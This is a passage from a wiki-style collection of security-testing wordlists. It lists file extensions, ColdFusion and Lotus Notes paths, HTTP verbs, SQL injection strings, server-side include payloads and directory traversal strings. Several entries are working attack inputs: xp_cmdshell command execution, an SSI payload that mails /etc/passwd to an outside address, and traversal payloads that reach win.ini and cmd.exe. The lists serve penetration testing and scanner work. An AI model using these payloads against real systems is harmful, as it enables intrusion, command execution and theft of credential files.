.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Some server side include statements&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
